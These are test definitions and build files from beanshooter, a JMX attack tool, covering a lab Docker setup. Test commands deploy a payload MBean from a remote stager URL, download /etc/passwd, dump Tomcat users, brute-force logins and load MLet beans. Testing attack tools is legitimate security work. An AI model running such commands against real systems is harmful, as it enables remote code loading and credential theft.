| 62 | validators: 63 | - error: True 64 | - contains: 65 | values: 66 | - An attribute with name test does not exist on the endpoint 67 | 68 | 69 | - title: Wrong attribute type 70 | description: |- 71 | Surprisingly, this does not lead to an error when using the Jolokia adapter 72 | 73 | command: 74 | - beanshooter 75 | - attr 76 | - ${TARGET} 77 | - ${OPTIONS} 78 | - java.lang:type=Memory 79 | - Verbose 80 | - test 81 | 82 | validators: 83 | - error: False 84 | -------------------------------------------------------------------------------- /tonka-bean/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4.0.0 3 | 4 | 5 | de.qtc.beanshooter 6 | reactor 7 | 4.1.0 8 | 9 | 10 | tonka-bean 11 | 12 | 13 | UTF-8 14 | 1.8 15 | 1.8 16 | 17 | 18 | 19 | 20 | src 21 | 22 | 23 | 24 | maven-assembly-plugin 25 | 26 | 27 | package 28 | 29 | single 30 | 31 | 32 | 33 | 34 | tonka-bean-${project.version} 35 | 36 | 37 | de.qtc.beanshooter.tonkabean.TonkaBean 38 | true 39 | 40 | 41 | 42 | jar-with-dependencies 43 | 44 | 45 | 46 | 47 | 48 | maven-jar-plugin 49 | 3.2.0 50 | 51 | 52 | default-jar 53 | none 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/deploy/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka deploy action (RMI) 3 | description: |- 4 | Perform tests on beanshooters tonka deploy action for RMI based connections 5 | 6 | id: '03-01-02' 7 | groups: 8 | - rmi 9 | id_pattern: '03-01-02-{:02}' 10 | 11 | conditionals: 12 | deployed: False 13 | 14 | tests: 15 | - title: Deploy tonka bean 16 | description: |- 17 | Deploy the tonka bean using it's dedicated deploy action 18 | 19 | command: 20 | - beanshooter 21 | - tonka 22 | - deploy 23 | - ${TARGET_PLAIN} 24 | - ${OPTIONS} 25 | - --stager-url 26 | - 'http://${DOCKER-GW}:8000' 27 | - --username 28 | - admin 29 | - --password 30 | - admin 31 | 32 | conditions: 33 | on_success: 34 | deployed: True 35 | 36 | on_error: 37 | deployed: False 38 | 39 | validators: 40 | - error: False 41 | - contains: 42 | values: 43 | - 'MBean class is not known by the server' 44 | - 'Creating MLetHandler for endpoint: /' 45 | - 'Waiting for incoming connections' 46 | - 'Incoming request from: ' 47 | - 'de.qtc.beanshooter.tonkabean.TonkaBean' 48 | - 'MBean with object name MLetTonkaBean:name=TonkaBean,id=1 was successfully deployed' 49 | 50 | 51 | - title: Undeploy tonka bean 52 | description: |- 53 | Deploy the tonka bean using it's dedicated undeploy action 54 | 55 | command: 56 | - beanshooter 57 | - tonka 58 | - undeploy 59 | - ${TARGET_PLAIN} 60 | - ${OPTIONS} 61 | - --username 62 | - admin 63 | - --password 64 | - admin 65 | 66 | conditions: 67 | all: 68 | - deployed 69 | 70 | on_success: 71 | deployed: False 72 | 73 | validators: 74 | - error: False 75 | - contains: 76 | values: 77 | - 'Removing MBean with ObjectName MLetTonkaBean:name=TonkaBean,id=1 from the MBeanServer' 78 | - 'MBean was successfully removed' 79 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/download/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka download action (ERROR) 3 | description: |- 4 | Perform tests on the error handling of beanshooters tonka download action 5 | 6 | id: '03-06-03' 7 | groups: 8 | - error 9 | id_pattern: '03-06-03-{:02}' 10 | 11 | 12 | tests: 13 | - title: Download non existing file 14 | description: |- 15 | Attempt to download a non existing file 16 | 17 | command: 18 | - beanshooter 19 | - tonka 20 | - download 21 | - ${JMXMP_NTLM} 22 | - ${OPTIONS} 23 | - --username 24 | - controlRole 25 | - --password 26 | - control 27 | - /etc/passwd42 28 | 29 | validators: 30 | - error: True 31 | - contains: 32 | values: 33 | - 'The specified file /etc/passwd42 seems not to exist' 34 | - file_exists: 35 | invert: 36 | - passwd42 37 | 38 | 39 | - title: Download directory 40 | description: |- 41 | Attempt to download a directory 42 | 43 | command: 44 | - beanshooter 45 | - tonka 46 | - download 47 | - ${JMXMP_NTLM} 48 | - ${OPTIONS} 49 | - --username 50 | - controlRole 51 | - --password 52 | - control 53 | - /etc 54 | 55 | validators: 56 | - error: True 57 | - contains: 58 | values: 59 | - 'The specified path /etc is an existing directory' 60 | - file_exists: 61 | invert: 62 | - passwd42 63 | 64 | 65 | - title: Download to non writable directory 66 | description: |- 67 | Attempt to download to a non writable directory 68 | 69 | command: 70 | - beanshooter 71 | - tonka 72 | - download 73 | - ${JMXMP_NTLM} 74 | - ${OPTIONS} 75 | - --username 76 | - controlRole 77 | - --password 78 | - control 79 | - /etc/passwd 80 | - /root/passwd 81 | 82 | validators: 83 | - error: True 84 | - contains: 85 | values: 86 | - 'Missing the required permissions to write to: /root/passwd' 87 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/upload/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka upload action (ERROR) 3 | description: |- 4 | Perform tests on the error handling of beanshooters tonka upload action 5 | 6 | id: '03-07-03' 7 | groups: 8 | - error 9 | id_pattern: '03-07-03-{:02}' 10 | 11 | 12 | plugins: 13 | - tempfile: 14 | path: tempfile 15 | content: |- 16 | Random content 17 | 18 | 19 | tests: 20 | - title: Upload a non existing file 21 | description: |- 22 | Attempt to upload a non existing file 23 | 24 | command: 25 | - beanshooter 26 | - tonka 27 | - upload 28 | - ${JMXMP_NTLM} 29 | - ${OPTIONS} 30 | - --username 31 | - controlRole 32 | - --password 33 | - control 34 | - nonono 35 | 36 | validators: 37 | - error: True 38 | - contains: 39 | values: 40 | - 'nonono to path . on the MBeanSerer' 41 | - 'nonono seems not to exist' 42 | 43 | 44 | - title: Upload /root/file 45 | description: |- 46 | Upload a file we do not have permission to 47 | 48 | command: 49 | - beanshooter 50 | - tonka 51 | - upload 52 | - ${JMXMP_NTLM} 53 | - ${OPTIONS} 54 | - --username 55 | - controlRole 56 | - --password 57 | - control 58 | - /root/file 59 | 60 | validators: 61 | - error: True 62 | - contains: 63 | values: 64 | - 'Missing the required permissions to read file: /root/file' 65 | 66 | 67 | - title: Upload to non existing dir 68 | description: |- 69 | Upload a tempfile to a non existing directory 70 | 71 | command: 72 | - beanshooter 73 | - tonka 74 | - upload 75 | - ${JMXMP_NTLM} 76 | - ${OPTIONS} 77 | - --username 78 | - controlRole 79 | - --password 80 | - control 81 | - tempfile 82 | - /tmp/test/test 83 | 84 | validators: 85 | - error: True 86 | - contains: 87 | values: 88 | - 'The parent directory of /tmp/test/test seems not to exist' 89 | -------------------------------------------------------------------------------- /tests/jolokia/tomcat/dump/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat dump action (Error) 3 | description: |- 4 | Perform tests on the error handling of the dump action 5 | 6 | id: '10-02-02' 7 | groups: 8 | - error 9 | id_pattern: '10-02-02-{:02}' 10 | 11 | tests: 12 | - title: Dump to non writable file 13 | description: |- 14 | Dump user names to a non writable file 15 | 16 | command: 17 | - beanshooter 18 | - tomcat 19 | - dump 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - /etc/users.txt 23 | 24 | validators: 25 | - error: True 26 | - contains: 27 | values: 28 | - 'Caught java.io.FileNotFoundException while opening output file' 29 | - 'Missing the required permissions to write to' 30 | 31 | - title: Dump to non existing dir 32 | description: |- 33 | Dump usernames to a non existind directory 34 | 35 | command: 36 | - beanshooter 37 | - tomcat 38 | - dump 39 | - ${TARGET} 40 | - ${OPTIONS} 41 | - /tmp/not-here/users.txt 42 | 43 | validators: 44 | - error: True 45 | - contains: 46 | values: 47 | - 'Caught java.io.FileNotFoundException while opening output file' 48 | - 'The parent directory of' 49 | - 'seems not to exist' 50 | 51 | - title: Dump passwords to a directory 52 | description: |- 53 | Choose an existing directory for the passwords file 54 | 55 | command: 56 | - beanshooter 57 | - tomcat 58 | - dump 59 | - ${TARGET} 60 | - ${OPTIONS} 61 | - users.txt 62 | - /etc 63 | 64 | validators: 65 | - error: True 66 | - regex: 67 | match: 68 | - 'Users dumped to .+users.txt' 69 | - 'Caught java.io.FileNotFoundException while opening output file' 70 | - 'The specified path .+ is an existing directory' 71 | - file_contains: 72 | - file: users.txt 73 | contains: 74 | - 'manager' 75 | - 'admin' 76 | - 'status' 77 | - file_exists: 78 | cleanup: True 79 | files: 80 | - users.txt 81 | -------------------------------------------------------------------------------- /tests/jmx-example-server/brute/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: brute action (Error) 3 | description: |- 4 | Performs some test on error cases that can occur during the brute action 5 | 6 | id: '01-01-03' 7 | groups: 8 | - error 9 | id_pattern: '01-01-03-{:02}' 10 | 11 | 12 | tests: 13 | - title: Missing Password 14 | description: |- 15 | Perform a bruteforce attack with a specified username but a missing 16 | password. 17 | 18 | command: 19 | - beanshooter 20 | - brute 21 | - ${TARGET_PLAIN} 22 | - ${OPTIONS} 23 | - --username 24 | - carlos 25 | 26 | validators: 27 | - error: True 28 | - contains: 29 | values: 30 | - No password(s) specified for the brute action 31 | 32 | - title: Missing Username 33 | description: |- 34 | Perform a bruteforce attack with a specified password but a missing 35 | username. 36 | 37 | command: 38 | - beanshooter 39 | - brute 40 | - ${TARGET_PLAIN} 41 | - ${OPTIONS} 42 | - --password 43 | - secret 44 | 45 | validators: 46 | - error: True 47 | - contains: 48 | values: 49 | - No username(s) specified for the brute action. 50 | 51 | - title: Non existing user wordlist 52 | description: |- 53 | Perform a bruteforce attack with a non existing user wordlist 54 | 55 | command: 56 | - beanshooter 57 | - brute 58 | - ${TARGET_PLAIN} 59 | - ${OPTIONS} 60 | - --username-file 61 | - /nonono 62 | 63 | validators: 64 | - error: True 65 | - contains: 66 | values: 67 | - The specified file /nonono seems not to exis 68 | 69 | - title: Non existing password wordlist 70 | description: |- 71 | Perform a bruteforce attack with a non existing password wordlist 72 | 73 | command: 74 | - beanshooter 75 | - brute 76 | - ${TARGET_PLAIN} 77 | - ${OPTIONS} 78 | - --password-file 79 | - /nonono 80 | 81 | validators: 82 | - error: True 83 | - contains: 84 | values: 85 | - The specified file /nonono seems not to exis 86 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/dump/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat dump action (Error) 3 | description: |- 4 | Perform tests on the error handling of the dump action 5 | 6 | id: '05-02-02' 7 | groups: 8 | - error 9 | id_pattern: '05-02-02-{:02}' 10 | 11 | 12 | tests: 13 | - title: Dump to non writable file 14 | description: |- 15 | Dump user names to a non writable file 16 | 17 | command: 18 | - beanshooter 19 | - tomcat 20 | - dump 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | - /etc/users.txt 24 | 25 | validators: 26 | - error: True 27 | - contains: 28 | values: 29 | - 'Caught java.io.FileNotFoundException while opening output file' 30 | - 'Missing the required permissions to write to' 31 | 32 | - title: Dump to non existing dir 33 | description: |- 34 | Dump usernames to a non existind directory 35 | 36 | command: 37 | - beanshooter 38 | - tomcat 39 | - dump 40 | - ${TARGET} 41 | - ${OPTIONS} 42 | - /tmp/not-here/users.txt 43 | 44 | validators: 45 | - error: True 46 | - contains: 47 | values: 48 | - 'Caught java.io.FileNotFoundException while opening output file' 49 | - 'The parent directory of' 50 | - 'seems not to exist' 51 | 52 | - title: Dump passwords to a directory 53 | description: |- 54 | Choose an existing directory for the passwords file 55 | 56 | command: 57 | - beanshooter 58 | - tomcat 59 | - dump 60 | - ${TARGET} 61 | - ${OPTIONS} 62 | - users.txt 63 | - /etc 64 | 65 | validators: 66 | - error: True 67 | - regex: 68 | match: 69 | - 'Users dumped to .+users.txt' 70 | - 'Caught java.io.FileNotFoundException while opening output file' 71 | - 'The specified path .+ is an existing directory' 72 | - file_contains: 73 | - file: users.txt 74 | contains: 75 | - 'manager' 76 | - 'admin' 77 | - 'status' 78 | - file_exists: 79 | cleanup: True 80 | files: 81 | - users.txt 82 | -------------------------------------------------------------------------------- /tests/jmx-example-server/list/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: list action (RMI) 3 | description: |- 4 | Perform tests on beanshooters list action for RMI based connections 5 | 6 | id: '01-05-01' 7 | groups: 8 | - rmi 9 | id_pattern: '01-05-01-{:02}' 10 | 11 | tests: 12 | - title: List Unauth JMX 13 | description: |- 14 | Performs the list action on an unauthenticated JMX service 15 | 16 | command: 17 | - beanshooter 18 | - list 19 | - ${TARGET_UNAUTH} 20 | - ${OPTIONS} 21 | 22 | validators: 23 | - error: False 24 | - contains: 25 | values: 26 | - 'Available MBeans:' 27 | - 'javax.management.MBeanServerDelegate (JMImplementation:type=MBeanServerDelegate)' 28 | - 'sun.management.MemoryManagerImpl (java.lang:name=Metaspace Manager,type=MemoryManager)' 29 | 30 | - title: List Plain JMX 31 | description: |- 32 | Performs the list action on an JMX service that uses plain authentication 33 | 34 | command: 35 | - beanshooter 36 | - list 37 | - ${TARGET_PLAIN} 38 | - ${OPTIONS} 39 | - --username 40 | - admin 41 | - --password 42 | - admin 43 | 44 | validators: 45 | - error: False 46 | - contains: 47 | values: 48 | - 'Available MBeans:' 49 | - 'javax.management.MBeanServerDelegate (JMImplementation:type=MBeanServerDelegate)' 50 | - 'sun.management.MemoryManagerImpl (java.lang:name=Metaspace Manager,type=MemoryManager)' 51 | 52 | - title: List default JMX 53 | description: |- 54 | Performs the list action on an JMX service that uses default authentication 55 | 56 | command: 57 | - beanshooter 58 | - list 59 | - ${TARGET_JMX} 60 | - ${OPTIONS} 61 | - --username 62 | - controlRole 63 | - --password 64 | - control 65 | 66 | validators: 67 | - error: False 68 | - contains: 69 | values: 70 | - 'Available MBeans:' 71 | - 'javax.management.MBeanServerDelegate (JMImplementation:type=MBeanServerDelegate)' 72 | - 'sun.management.MemoryManagerImpl (java.lang:name=Metaspace Manager,type=MemoryManager)' 73 | -------------------------------------------------------------------------------- /tests/jmx-example-server/list/jmxmp/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: list action (JMXMP) 3 | description: |- 4 | Perform tests on beanshooters list action for JMXMP based connections 5 | 6 | id: '01-05-02' 7 | groups: 8 | - jmxmp 9 | id_pattern: '01-05-02-{:02}' 10 | 11 | tests: 12 | - title: List Unauth JMX 13 | description: |- 14 | Performs the list action on an unauthenticated JMX service 15 | 16 | command: 17 | - beanshooter 18 | - list 19 | - ${JMXMP_UNAUTH} 20 | - ${OPTIONS} 21 | 22 | validators: 23 | - error: False 24 | - contains: 25 | values: 26 | - 'Available MBeans:' 27 | - 'javax.management.MBeanServerDelegate (JMImplementation:type=MBeanServerDelegate)' 28 | - 'sun.management.MemoryManagerImpl (java.lang:name=Metaspace Manager,type=MemoryManager)' 29 | 30 | - title: List Plain JMX 31 | description: |- 32 | Performs the list action on an JMX service that uses plain authentication 33 | 34 | command: 35 | - beanshooter 36 | - list 37 | - ${JMXMP_PLAIN} 38 | - ${OPTIONS} 39 | - --username 40 | - controlRole 41 | - --password 42 | - control 43 | 44 | validators: 45 | - error: False 46 | - contains: 47 | values: 48 | - 'Available MBeans:' 49 | - 'javax.management.MBeanServerDelegate (JMImplementation:type=MBeanServerDelegate)' 50 | - 'sun.management.MemoryManagerImpl (java.lang:name=Metaspace Manager,type=MemoryManager)' 51 | 52 | - title: List NTLM JMX 53 | description: |- 54 | Performs the list action on an JMX service that uses NTLM authentication 55 | 56 | command: 57 | - beanshooter 58 | - list 59 | - ${JMXMP_NTLM} 60 | - ${OPTIONS} 61 | - --username 62 | - controlRole 63 | - --password 64 | - control 65 | 66 | validators: 67 | - error: False 68 | - contains: 69 | values: 70 | - 'Available MBeans:' 71 | - 'javax.management.MBeanServerDelegate (JMImplementation:type=MBeanServerDelegate)' 72 | - 'sun.management.MemoryManagerImpl (java.lang:name=Metaspace Manager,type=MemoryManager)' 73 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/mlet/status/jmxmp/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: mlet status action (JMXMP) 3 | description: |- 4 | Perform tests on beanshooters mlet status action for JMXMP based connections 5 | 6 | id: '04-01-02' 7 | groups: 8 | - jmxmp 9 | id_pattern: '04-01-02-{:02}' 10 | 11 | 12 | tests: 13 | - title: Plain status call 14 | description: |- 15 | Call the status action on a non deployed mlet bean 16 | 17 | command: 18 | - beanshooter 19 | - mlet 20 | - status 21 | - ${JMXMP_CRAM} 22 | - ${OPTIONS} 23 | - --username 24 | - controlRole 25 | - --password 26 | - control 27 | 28 | validators: 29 | - error: False 30 | - contains: 31 | values: 32 | - 'MBean Status: not deployed' 33 | 34 | 35 | - title: deploy mlet bean 36 | description: |- 37 | Deploy the mlet MBean 38 | 39 | command: 40 | - beanshooter 41 | - mlet 42 | - deploy 43 | - ${JMXMP_TLS} 44 | - ${OPTIONS} 45 | - --username 46 | - controlRole 47 | - --password 48 | - control 49 | 50 | validators: 51 | - error: False 52 | - contains: 53 | values: 54 | - 'MBean with object name DefaultDomain:type=MLet was successfully deployed' 55 | 56 | 57 | - title: Plain status call 58 | description: |- 59 | Call the status action on a deployed mlet bean 60 | 61 | command: 62 | - beanshooter 63 | - mlet 64 | - status 65 | - ${JMXMP_NTLM} 66 | - ${OPTIONS} 67 | - --username 68 | - controlRole 69 | - --password 70 | - control 71 | 72 | validators: 73 | - error: False 74 | - contains: 75 | values: 76 | - 'MBean Status: deployed' 77 | - 'Class Name: javax.management.loading.MLet' 78 | - 'Object Name: DefaultDomain:type=MLet' 79 | 80 | 81 | - title: Undeploy mlet bean 82 | description: |- 83 | Undeploy the mlet bean again 84 | 85 | command: 86 | - beanshooter 87 | - mlet 88 | - undeploy 89 | - ${JMXMP_UNAUTH} 90 | - ${OPTIONS} 91 | 92 | validators: 93 | - error: False 94 | - contains: 95 | values: 96 | - 'Removing MBean with ObjectName DefaultDomain:type=MLet from the MBeanServer' 97 | - 'MBean was successfully removed' 98 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/networking/RMIEndpoint.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.networking; 2 | 3 | import java.rmi.server.ObjID; 4 | import java.rmi.server.RMIClientSocketFactory; 5 | import java.rmi.server.RemoteRef; 6 | 7 | import de.qtc.beanshooter.plugin.PluginSystem; 8 | import sun.rmi.server.UnicastRef; 9 | import sun.rmi.transport.Endpoint; 10 | import sun.rmi.transport.LiveRef; 11 | import sun.rmi.transport.tcp.TCPEndpoint; 12 | 13 | /** 14 | * The RMIEndpoint class represents an RMI endpoint on a remote server. RMIEndpoint can be extended 15 | * by RMIRegistryEndpoint, which supports some more registry related functionalities. 16 | * 17 | * @author Tobias Neitzel (@qtc_de) 18 | */ 19 | @SuppressWarnings("restriction") 20 | public class RMIEndpoint { 21 | 22 | public int port; 23 | public String host; 24 | 25 | protected RMIClientSocketFactory csf; 26 | 27 | /** 28 | * Creates a new RMIEndpoint instance and configures the corresponding client side socket 29 | * factory according to the options specified on the command line. 30 | * 31 | * @param host Remote host where the RMIEndpoint belongs to 32 | * @param port Remote port where the RMIEndpoint belongs to 33 | */ 34 | public RMIEndpoint(String host, int port) 35 | { 36 | this.host = host; 37 | this.port = port; 38 | this.csf = PluginSystem.getRMIClientSocketFactory(host, port); 39 | } 40 | 41 | /** 42 | * Creates a new RMIEndpoint instance and allows the user to specify a client side 43 | * socket factory. 44 | * 45 | * @param host Remote host where the RMIEndpoint belongs to 46 | * @param port Remote port where the RMIEndpoint belongs to 47 | * @param csf Socket factory to use for connection attempts 48 | */ 49 | public RMIEndpoint(String host, int port, RMIClientSocketFactory csf) 50 | { 51 | this.host = host; 52 | this.port = port; 53 | this.csf = csf; 54 | } 55 | 56 | /** 57 | * Constructs a RemoteRef by using the endpoint information (host, port, csf) and the 58 | * specified objID. 59 | * 60 | * @param objID identifies the targeted remote object on the server side 61 | * @return newly constructed RemoteRef 62 | */ 63 | public RemoteRef getRemoteRef(ObjID objID) 64 | { 65 | Endpoint endpoint = new TCPEndpoint(host, port, csf, null); 66 | return new UnicastRef(new LiveRef(objID, endpoint, false)); 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /tests/serverless/export/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: export action (Error) 3 | description: |- 4 | Perform tests on the error handling of beanshooters export action 5 | 6 | id: '02-03-02' 7 | groups: 8 | - error 9 | id_pattern: '02-03-02-{:02}' 10 | 11 | 12 | tests: 13 | - title: Missing Stager URL 14 | description: |- 15 | Perform a full export without specifying a stager url 16 | 17 | command: 18 | - beanshooter 19 | - tonka 20 | - export 21 | - --no-color 22 | 23 | extractors: 24 | - regex: 25 | pattern: 'tonka-bean-.+\.jar$' 26 | variable: 'jar-name' 27 | on_miss: 'break' 28 | multiline: true 29 | 30 | validators: 31 | - error: False 32 | - contains: 33 | values: 34 | - 'Exporting MBean jar file: ./tonka-bean-' 35 | - 'Error: The specified aciton requires the --stager-url option' 36 | - file_exists: 37 | cleanup: true 38 | files: 39 | - ${jar-name} 40 | invert: 41 | - inex.html 42 | 43 | 44 | - title: Non writable directory (jar file) 45 | description: |- 46 | Perform a jar export on a non writable directory 47 | 48 | command: 49 | - beanshooter 50 | - tonka 51 | - export 52 | - --no-color 53 | - --export-jar 54 | - /root/test 55 | 56 | validators: 57 | - error: True 58 | - contains: 59 | values: 60 | - 'Missing the required permissions to write to: /root/test' 61 | 62 | 63 | - title: Export on directory (mlet file) 64 | description: |- 65 | Perform an mlet export on a directory 66 | 67 | command: 68 | - beanshooter 69 | - tonka 70 | - export 71 | - --no-color 72 | - --export-mlet 73 | - /root 74 | 75 | validators: 76 | - error: True 77 | - contains: 78 | values: 79 | - 'The specified path /root is an existing directory' 80 | 81 | 82 | - title: Export on non existend directory 83 | description: |- 84 | Perform an export on a non existing directory 85 | 86 | command: 87 | - beanshooter 88 | - tonka 89 | - export 90 | - --export-dir /tmp/dududadadidi 91 | - --no-color 92 | 93 | validators: 94 | - error: True 95 | - contains: 96 | values: 97 | - 'The parent directory of /tmp/dududadadidi/' 98 | - 'seems not to exist' 99 | --------------------------------------------------------------------------------